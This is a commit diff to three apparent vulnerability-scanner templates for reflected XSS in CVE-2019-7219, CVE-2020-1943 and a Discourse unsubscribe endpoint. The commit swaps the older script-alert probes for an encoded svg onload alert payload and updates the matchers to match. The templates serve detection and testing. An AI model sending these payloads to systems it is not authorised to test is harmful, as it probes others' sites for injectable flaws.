xss matchers update

2021-03-04 21:32:34 +05:30 · 2021-03-04 21:32:34 +05:30 · 04cc9c44fb
parent b7aba7f7ac
commit 04cc9c44fb
3 changed files with 6 additions and 6 deletions
--- a/cves/2019/CVE-2019-7219.yaml
+++ b/cves/2019/CVE-2019-7219.yaml
@ -9,14 +9,14 @@ info:
 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/webapp/?fccc0\"><script>alert(1)</script>5f43d=1"
+      - '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
-          - "\"><script>alert(1)</script>"
+          - "<svg/onload=alert(xss)>"
      - type: word
        part: header
        words:
--- a/cves/2020/CVE-2020-1943.yaml
+++ b/cves/2020/CVE-2020-1943.yaml
@ -9,13 +9,13 @@ info:
 requests:
  - method: GET
    path:
-      - '{{BaseURL}}/control/stream?contentId=<svg/onload=alert(1)>'
+      - '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
-          - "<svg/onload=alert(1)>"
+          - "<svg/onload=alert(xss)>"
        part: body

      - type: word
--- a/vulnerabilities/other/discourse-xss.yaml
+++ b/vulnerabilities/other/discourse-xss.yaml
@ -10,7 +10,7 @@ info:
 requests:
  - method: GET
    path:
-      - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(1337)%3E'
+      - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(xss)%3E'
    matchers-condition: and
    matchers:
      - type: status
@ -19,7 +19,7 @@ requests:

      - type: word
        words:
-          - "<svg/onload=alert(1337)>"
+          - "<svg/onload=alert(xss)>"
        part: body

      - type: word